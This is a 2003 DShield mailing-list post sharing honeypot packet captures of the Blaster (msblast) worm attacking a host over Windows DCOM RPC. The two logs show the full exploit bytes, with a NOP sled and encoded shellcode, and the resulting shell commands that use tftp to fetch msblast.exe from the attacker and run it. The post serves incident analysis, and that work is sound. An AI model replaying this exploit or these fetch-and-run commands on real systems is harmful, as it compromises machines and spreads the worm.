[Dshield] infocon: yellow

John Sage jsage at finchhaven.com
Mon Aug 11 23:37:16 GMT 2003


Chris:

On Mon, Aug 11, 2003 at 03:01:05PM -0600, Chris Ream wrote:
> Has anyone captured the packet stream? I've got some sensors listening
> but have not yet seen it. I would like to reconstruct it and disassemble
> it to find out exactly what it's doing.

/*
   Posted in reply to an earlier Johannes post, but what the hey...
   This is a Linux firewall with ACK_hole running on 135 and 4444.
   After pushing "MEOW MEOW" down on TCP:135, the attacker assumes
   that he's tftp'ed down msblast.exe to TCP:4444, and then comes back
   a short time later to "start" it..
*/

Here's what one host seems to do:

ngrep_host: src host 12.82.154.207 in snort.log.1060642891
Generated 16:22:28 (TZ -07:00) 08/11/2003

input: snort.log.1060642891
filter: ip and ( src host 12.82.154.207 )
#
T 2003/08/11 16:21:29.473813 12.82.154.207:2406 -> 12.82.140.147:135 [S]
#
T 2003/08/11 16:21:29.723844 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.184005 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
  05 00 0b 03 10 00 00 00    48 00 00 00 7f 00 00 00    ........H.......
  d0 16 d0 16 00 00 00 00    01 00 00 00 01 00 01 00    ................
  a0 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  00 00 00 00 04 5d 88 8a    eb 1c c9 11 9f e8 08 00    .....]..........
  2b 10 48 60 02 00 00 00                               +.H`....        
#
T 2003/08/11 16:21:31.664210 12.82.154.207:2406 -> 12.82.140.147:135 [A]
  05 00 00 03 10 00 00 00    a8 06 00 00 e5 00 00 00    ................
  90 06 00 00 01 00 04 00    05 00 06 00 01 00 00 00    ................
  00 00 00 00 32 24 58 fd    cc 45 64 49 b0 70 dd ae    ....2$X..EdI.p..
  74 2c 96 d2 60 5e 0d 00    01 00 00 00 00 00 00 00    t,..`^..........
  70 5e 0d 00 02 00 00 00    7c 5e 0d 00 00 00 00 00    p^......|^......
  10 00 00 00 80 96 f1 f1    2a 4d ce 11 a6 6a 00 20    ........*M...j. 
  af 6e 72 f4 0c 00 00 00    4d 41 52 42 01 00 00 00    .nr.....MARB....
  00 00 00 00 0d f0 ad ba    00 00 00 00 a8 f4 0b 00    ................
  20 06 00 00 20 06 00 00    4d 45 4f 57 04 00 00 00     ... ...MEOW....
  a2 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  38 03 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    8..............F
  00 00 00 00 f0 05 00 00    e8 05 00 00 00 00 00 00    ................
  01 10 08 00 cc cc cc cc    c8 00 00 00 4d 45 4f 57    ............MEOW
  e8 05 00 00 d8 00 00 00    00 00 00 00 02 00 00 00    ................
  07 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 c4 28 cd 00    64 29 cd 00 00 00 00 00    .....(..d)......
  07 00 00 00 b9 01 00 00    00 00 00 00 c0 00 00 00    ................
  00 00 00 46 ab 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a5 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a6 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a4 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 ad 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 aa 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 07 00 00 00    60 00 00 00 58 00 00 00    ...F....`...X...
  90 00 00 00 40 00 00 00    20 00 00 00 38 03 00 00    .... at ... ...8...
  30 00 00 00 01 00 00 00    01 10 08 00 cc cc cc cc    0...............
  50 00 00 00 4f b6 88 20    ff ff ff ff 00 00 00 00    P...O.. ........
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    01 10 08 00 cc cc cc cc    ................
  48 00 00 00 07 00 66 00    06 09 02 00 00 00 00 00    H.....f.........
  c0 00 00 00 00 00 00 46    10 00 00 00 00 00 00 00    .......F........
  00 00 00 00 01 00 00 00    00 00 00 00 78 19 0c 00    ............x...
  58 00 00 00 05 00 06 00    01 00 00 00 70 d8 98 93    X...........p...
  98 4f d2 11 a9 3d be 57    b2 00 00 00 32 00 31 00    .O...=.W....2.1.
  01 10 08 00 cc cc cc cc    80 00 00 00 0d f0 ad ba    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  18 43 14 00 00 00 00 00    60 00 00 00 60 00 00 00    .C......`...`...
  4d 45 4f 57 04 00 00 00    c0 01 00 00 00 00 00 00    MEOW............
  c0 00 00 00 00 00 00 46    3b 03 00 00 00 00 00 00    .......F;.......
  c0 00 00 00 00 00 00 46    00 00 00 00 30 00 00 00    .......F....0...
  01 00 01 00 81 c5 17 03    80 0e e9 4a 99 99 f1 8a    ...........J....
  50 6f 7a 85 02 00 00 00    00 00 00 00 00 00 00 00    Poz.............
  00 00 00 00 00 00 00 00    00 00 00 00 01 00 00 00    ................
  01 10 08 00 cc cc cc cc    30 00 00 00 78 00 6e 00    ........0...x.n.
  00 00 00 00 d8 da 0d 00    00 00 00 00 00 00 00 00    ................
  20 2f 0c 00 00 00 00 00    00 00 00 00 03 00 00 00     /..............
  00 00 00 00 03 00 00 00    46 00 58 00 00 00 00 00    ........F.X.....
  01 10 08 00 cc cc cc cc    10 00 00 00 30 00 2e 00    ............0...
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  01 10 08 00 cc cc cc cc    68 00 00 00 0e 00 ff ff    ........h.......
  68 8b 0b 00 02 00 00 00    00 00 00 00 00 00 00 00    h...............
  86 01 00 00 00 00 00 00    86 01 00 00 5c 00 5c 00    ............\.\.
  46 00 58 00 4e 00 42 00    46 00 58 00 46 00 58 00    F.X.N.B.F.X.F.X.
  4e 00 42 00 46 00 58 00    46 00 58 00 46 00 58 00    N.B.F.X.F.X.F.X.
  46 00 58 00 9d 13 00 01    cc e0 fd 7f cc e0 fd 7f    F.X.............
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 eb    19 5e 31 c9 81 e9 89 ff    .........^1.....
  ff ff 81 36 80 bf 32 94    81 ee fc ff ff ff e2 f2    ...6..2.........
  eb 05 e8 e2 ff ff ff 03    53 06 1f 74 57 75 95 80    ........S..tWu..
  bf bb 92 7f 89 5a 1a ce    b1 de 7c e1 be 32 94 09    .....Z....|..2..
  f9 3a 6b b6 d7 9f 4d 85    71 da c6 81 bf 32 1d c6    .:k...M.q....2..
  b3 5a f8 ec bf 32 fc b3    8d 1c f0 e8 c8 41 a6 df    .Z...2.......A..
  eb cd c2 88 36 74 90 7f    89 5a e6 7e 0c 24 7c ad    ....6t...Z.~.$|.
  be 32 94 09 f9 22 6b b6    d7 4c 4c 62 cc da 8a 81    .2..."k..LLb....
  bf 32 1d c6 ab cd e2 84    d7 f9 79 7c 84 da 9a 81    .2........y|....
  bf 32 1d c6 a7 cd e2 84    d7 eb 9d 75 12 da 6a 80    .2.........u..j.
  bf 32 1d c6 a3 cd e2 84    d7 96 8e f0 78 da 7a 80    .2..........x.z.
  bf 32 1d c6 9f cd e2 84    d7 96 39 ae 56 da 4a 80    .2........9.V.J.
  bf 32 1d c6 9b cd e2 84    d7 d7 dd 06 f6 da 5a 80    .2............Z.
  bf 32 1d c6 97 cd e2 84    d7 d5 ed 46 c6 da 2a 80    .2.........F..*.
  bf 32 1d c6 93 01 6b 01    53 a2 95 80 bf 66 fc 81    .2....k.S....f..
  be 32 94 7f e9 2a c4 d0    ef 62 d4 d0 ff 62 6b d6    .2...*...b...bk.
  a3 b9 4c d7 e8 5a 96 80    ae 6e 1f 4c d5 24 c5 d3    ..L..Z...n.L.$..
  40 64 b4 d7 ec cd c2 a4    e8 63 c7 7f e9 1a 1f 50    @d.......c.....P
  d7 57 ec e5 bf 5a f7 ed    db 1c 1d e6 8f b1 78 d4    .W...Z........x.
  32 0e b0 b3 7f 01 5d 03    7e 27 3f 62 42 f4 d0 a4    2.....].~'?bB...
  af 76 6a c4 9b 0f 1d d4    9b 7a 1d d4 9b 7e 1d d4    .vj......z...~..
  9b 62 19 c4 9b 22 c0 d0    ee 63 c5 ea be 63 c5 7f    .b..."...c...c..
  c9 02 c5 7f e9 22 1f 4c    d5 cd 6b b1 40 64 98 0b    .....".L..k. at d..
  77 65 6b d6                                           wek.            
#
T 2003/08/11 16:21:31.704100 12.82.154.207:2406 -> 12.82.140.147:135 [AP]
  93 cd c2 94 ea 64 f0 21    8f 32 94 80 3a f2 ec 8c    .....d.!.2..:...
  34 72 98 0b cf 2e 39 0b    d7 3a 7f 89 34 72 a0 0b    4r....9..:..4r..
  17 8a 94 80 bf b9 51 de    e2 f0 90 80 ec 67 c2 d7    ......Q......g..
  34 5e b0 98 34 77 a8 0b    eb 37 ec 83 6a b9 de 98    4^..4w...7..j...
  34 68 b4 83 62 d1 a6 c9    34 06 1f 83 4a 01 6b 7c    4h..b...4...J.k|
  8c f2 38 ba 7b 46 93 41    70 3f 97 78 54 c0 af fc    ..8.{F.Ap?.xT...
  9b 26 e1 61 34 68 b0 83    62 54 1f 8c f4 b9 ce 9c    .&.a4h..bT......
  bc ef 1f 84 34 31 51 6b    bd 01 54 0b 6a 6d ca dd    ....41Qk..T.jm..
  e4 f0 90 80 2f a2 04 00    5c 00 43 00 24 00 5c 00    ..../...\.C.$.\.
  31 00 32 00 33 00 34 00    35 00 36 00 31 00 31 00    1.2.3.4.5.6.1.1.
  31 00 31 00 31 00 31 00    31 00 31 00 31 00 31 00    1.1.1.1.1.1.1.1.
  31 00 31 00 31 00 31 00    31 00 2e 00 64 00 6f 00    1.1.1.1.1...d.o.
  63 00 00 00 01 10 08 00    cc cc cc cc 20 00 00 00    c........... ...
  30 00 2d 00 00 00 00 00    88 2a 0c 00 02 00 00 00    0.-......*......
  01 00 00 00 28 8c 0c 00    01 00 00 00 07 00 00 00    ....(...........
  00 00 00 00                                           ....            
#
T 2003/08/11 16:21:31.714051 12.82.154.207:2406 -> 12.82.140.147:135 [AF]
#
T 2003/08/11 16:21:31.714092 12.82.154.207:2406 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:21:31.734052 12.82.154.207:2416 -> 12.82.140.147:4444 [S]
#
T 2003/08/11 16:21:32.004072 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:32.084084 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 35    tftp -i 12.82.15
  34 2e 32 30 37 20 47 45    54 20 6d 73 62 6c 61 73    4.207 GET msblas
  74 2e 65 78 65 0a                                     t.exe.          
#
T 2003/08/11 16:21:32.334124 12.82.154.207:2416 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:21:53.146276 12.82.154.207:2416 -> 12.82.140.147:4444 [AP]
  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
  65 0a                                                 e.              
exit


And another:

ngrep_host: src host 12.82.141.200 in snort.log.1060642891
Generated 16:25:10 (TZ -07:00) 08/11/2003

input: snort.log.1060642891
filter: ip and ( src host 12.82.141.200 )
#
T 2003/08/11 16:09:47.092158 12.82.141.200:1070 -> 12.82.140.147:135 [S]
#
T 2003/08/11 16:09:47.552244 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:48.622333 12.82.141.200:1070 -> 12.82.140.147:135 [AP]
  05 00 0b 03 10 00 00 00    48 00 00 00 7f 00 00 00    ........H.......
  d0 16 d0 16 00 00 00 00    01 00 00 00 01 00 01 00    ................
  a0 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  00 00 00 00 04 5d 88 8a    eb 1c c9 11 9f e8 08 00    .....]..........
  2b 10 48 60 02 00 00 00                               +.H`....        
#
T 2003/08/11 16:09:49.162599 12.82.141.200:1070 -> 12.82.140.147:135 [A]
  05 00 00 03 10 00 00 00    a8 06 00 00 e5 00 00 00    ................
  90 06 00 00 01 00 04 00    05 00 06 00 01 00 00 00    ................
  00 00 00 00 32 24 58 fd    cc 45 64 49 b0 70 dd ae    ....2$X..EdI.p..
  74 2c 96 d2 60 5e 0d 00    01 00 00 00 00 00 00 00    t,..`^..........
  70 5e 0d 00 02 00 00 00    7c 5e 0d 00 00 00 00 00    p^......|^......
  10 00 00 00 80 96 f1 f1    2a 4d ce 11 a6 6a 00 20    ........*M...j. 
  af 6e 72 f4 0c 00 00 00    4d 41 52 42 01 00 00 00    .nr.....MARB....
  00 00 00 00 0d f0 ad ba    00 00 00 00 a8 f4 0b 00    ................
  20 06 00 00 20 06 00 00    4d 45 4f 57 04 00 00 00     ... ...MEOW....
  a2 01 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    ...............F
  38 03 00 00 00 00 00 00    c0 00 00 00 00 00 00 46    8..............F
  00 00 00 00 f0 05 00 00    e8 05 00 00 00 00 00 00    ................
  01 10 08 00 cc cc cc cc    c8 00 00 00 4d 45 4f 57    ............MEOW
  e8 05 00 00 d8 00 00 00    00 00 00 00 02 00 00 00    ................
  07 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 c4 28 cd 00    64 29 cd 00 00 00 00 00    .....(..d)......
  07 00 00 00 b9 01 00 00    00 00 00 00 c0 00 00 00    ................
  00 00 00 46 ab 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a5 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a6 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 a4 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 ad 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 aa 01 00 00    00 00 00 00 c0 00 00 00    ...F............
  00 00 00 46 07 00 00 00    60 00 00 00 58 00 00 00    ...F....`...X...
  90 00 00 00 40 00 00 00    20 00 00 00 38 03 00 00    .... at ... ...8...
  30 00 00 00 01 00 00 00    01 10 08 00 cc cc cc cc    0...............
  50 00 00 00 4f b6 88 20    ff ff ff ff 00 00 00 00    P...O.. ........
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  00 00 00 00 00 00 00 00    01 10 08 00 cc cc cc cc    ................
  48 00 00 00 07 00 66 00    06 09 02 00 00 00 00 00    H.....f.........
  c0 00 00 00 00 00 00 46    10 00 00 00 00 00 00 00    .......F........
  00 00 00 00 01 00 00 00    00 00 00 00 78 19 0c 00    ............x...
  58 00 00 00 05 00 06 00    01 00 00 00 70 d8 98 93    X...........p...
  98 4f d2 11 a9 3d be 57    b2 00 00 00 32 00 31 00    .O...=.W....2.1.
  01 10 08 00 cc cc cc cc    80 00 00 00 0d f0 ad ba    ................
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  18 43 14 00 00 00 00 00    60 00 00 00 60 00 00 00    .C......`...`...
  4d 45 4f 57 04 00 00 00    c0 01 00 00 00 00 00 00    MEOW............
  c0 00 00 00 00 00 00 46    3b 03 00 00 00 00 00 00    .......F;.......
  c0 00 00 00 00 00 00 46    00 00 00 00 30 00 00 00    .......F....0...
  01 00 01 00 81 c5 17 03    80 0e e9 4a 99 99 f1 8a    ...........J....
  50 6f 7a 85 02 00 00 00    00 00 00 00 00 00 00 00    Poz.............
  00 00 00 00 00 00 00 00    00 00 00 00 01 00 00 00    ................
  01 10 08 00 cc cc cc cc    30 00 00 00 78 00 6e 00    ........0...x.n.
  00 00 00 00 d8 da 0d 00    00 00 00 00 00 00 00 00    ................
  20 2f 0c 00 00 00 00 00    00 00 00 00 03 00 00 00     /..............
  00 00 00 00 03 00 00 00    46 00 58 00 00 00 00 00    ........F.X.....
  01 10 08 00 cc cc cc cc    10 00 00 00 30 00 2e 00    ............0...
  00 00 00 00 00 00 00 00    00 00 00 00 00 00 00 00    ................
  01 10 08 00 cc cc cc cc    68 00 00 00 0e 00 ff ff    ........h.......
  68 8b 0b 00 02 00 00 00    00 00 00 00 00 00 00 00    h...............
  86 01 00 00 00 00 00 00    86 01 00 00 5c 00 5c 00    ............\.\.
  46 00 58 00 4e 00 42 00    46 00 58 00 46 00 58 00    F.X.N.B.F.X.F.X.
  4e 00 42 00 46 00 58 00    46 00 58 00 46 00 58 00    N.B.F.X.F.X.F.X.
  46 00 58 00 9f 75 18 00    cc e0 fd 7f cc e0 fd 7f    F.X..u..........
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 eb    19 5e 31 c9 81 e9 89 ff    .........^1.....
  ff ff 81 36 80 bf 32 94    81 ee fc ff ff ff e2 f2    ...6..2.........
  eb 05 e8 e2 ff ff ff 03    53 06 1f 74 57 75 95 80    ........S..tWu..
  bf bb 92 7f 89 5a 1a ce    b1 de 7c e1 be 32 94 09    .....Z....|..2..
  f9 3a 6b b6 d7 9f 4d 85    71 da c6 81 bf 32 1d c6    .:k...M.q....2..
  b3 5a f8 ec bf 32 fc b3    8d 1c f0 e8 c8 41 a6 df    .Z...2.......A..
  eb cd c2 88 36 74 90 7f    89 5a e6 7e 0c 24 7c ad    ....6t...Z.~.$|.
  be 32 94 09 f9 22 6b b6    d7 4c 4c 62 cc da 8a 81    .2..."k..LLb....
  bf 32 1d c6 ab cd e2 84    d7 f9 79 7c 84 da 9a 81    .2........y|....
  bf 32 1d c6 a7 cd e2 84    d7 eb 9d 75 12 da 6a 80    .2.........u..j.
  bf 32 1d c6 a3 cd e2 84    d7 96 8e f0 78 da 7a 80    .2..........x.z.
  bf 32 1d c6 9f cd e2 84    d7 96 39 ae 56 da 4a 80    .2........9.V.J.
  bf 32 1d c6 9b cd e2 84    d7 d7 dd 06 f6 da 5a 80    .2............Z.
  bf 32 1d c6 97 cd e2 84    d7 d5 ed 46 c6 da 2a 80    .2.........F..*.
  bf 32 1d c6 93 01 6b 01    53 a2 95 80 bf 66 fc 81    .2....k.S....f..
  be 32 94 7f e9 2a c4 d0    ef 62 d4 d0 ff 62 6b d6    .2...*...b...bk.
  a3 b9 4c d7 e8 5a 96 80    ae 6e 1f 4c d5 24 c5 d3    ..L..Z...n.L.$..
  40 64 b4 d7 ec cd c2 a4    e8 63 c7 7f e9 1a 1f 50    @d.......c.....P
  d7 57 ec e5 bf 5a f7 ed    db 1c 1d e6 8f b1 78 d4    .W...Z........x.
  32 0e b0 b3 7f 01 5d 03    7e 27 3f 62 42 f4 d0 a4    2.....].~'?bB...
  af 76 6a c4 9b 0f 1d d4    9b 7a 1d d4 9b 7e 1d d4    .vj......z...~..
  9b 62 19 c4 9b 22 c0 d0    ee 63 c5 ea be 63 c5 7f    .b..."...c...c..
  c9 02 c5 7f e9 22 1f 4c    d5 cd 6b b1 40 64 98 0b    .....".L..k. at d..
  77 65 6b d6                                           wek.            
#
T 2003/08/11 16:09:49.242407 12.82.141.200:1070 -> 12.82.140.147:135 [AP]
  93 cd c2 94 ea 64 f0 21    8f 32 94 80 3a f2 ec 8c    .....d.!.2..:...
  34 72 98 0b cf 2e 39 0b    d7 3a 7f 89 34 72 a0 0b    4r....9..:..4r..
  17 8a 94 80 bf b9 51 de    e2 f0 90 80 ec 67 c2 d7    ......Q......g..
  34 5e b0 98 34 77 a8 0b    eb 37 ec 83 6a b9 de 98    4^..4w...7..j...
  34 68 b4 83 62 d1 a6 c9    34 06 1f 83 4a 01 6b 7c    4h..b...4...J.k|
  8c f2 38 ba 7b 46 93 41    70 3f 97 78 54 c0 af fc    ..8.{F.Ap?.xT...
  9b 26 e1 61 34 68 b0 83    62 54 1f 8c f4 b9 ce 9c    .&.a4h..bT......
  bc ef 1f 84 34 31 51 6b    bd 01 54 0b 6a 6d ca dd    ....41Qk..T.jm..
  e4 f0 90 80 2f a2 04 00    5c 00 43 00 24 00 5c 00    ..../...\.C.$.\.
  31 00 32 00 33 00 34 00    35 00 36 00 31 00 31 00    1.2.3.4.5.6.1.1.
  31 00 31 00 31 00 31 00    31 00 31 00 31 00 31 00    1.1.1.1.1.1.1.1.
  31 00 31 00 31 00 31 00    31 00 2e 00 64 00 6f 00    1.1.1.1.1...d.o.
  63 00 00 00 01 10 08 00    cc cc cc cc 20 00 00 00    c........... ...
  30 00 2d 00 00 00 00 00    88 2a 0c 00 02 00 00 00    0.-......*......
  01 00 00 00 28 8c 0c 00    01 00 00 00 07 00 00 00    ....(...........
  00 00 00 00                                           ....            
#
T 2003/08/11 16:09:49.252459 12.82.141.200:1070 -> 12.82.140.147:135 [AF]
#
T 2003/08/11 16:09:49.252491 12.82.141.200:1070 -> 12.82.140.147:135 [A]
#
T 2003/08/11 16:09:49.262406 12.82.141.200:1080 -> 12.82.140.147:4444 [S]
#
T 2003/08/11 16:09:49.592427 12.82.141.200:1080 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:09:49.752452 12.82.141.200:1080 -> 12.82.140.147:4444 [AP]
  74 66 74 70 20 2d 69 20    31 32 2e 38 32 2e 31 34    tftp -i 12.82.14
  31 2e 32 30 30 20 47 45    54 20 6d 73 62 6c 61 73    1.200 GET msblas
  74 2e 65 78 65 0a                                     t.exe.          
#
T 2003/08/11 16:09:50.102490 12.82.141.200:1080 -> 12.82.140.147:4444 [A]
#
T 2003/08/11 16:10:10.704598 12.82.141.200:1080 -> 12.82.140.147:4444 [AP]
  73 74 61 72 74 20 6d 73    62 6c 61 73 74 2e 65 78    start msblast.ex
  65 0a                                                 e.              
exit



- John
-- 
"Obviously, we do not want to leave zombies around."




More information about the list mailing list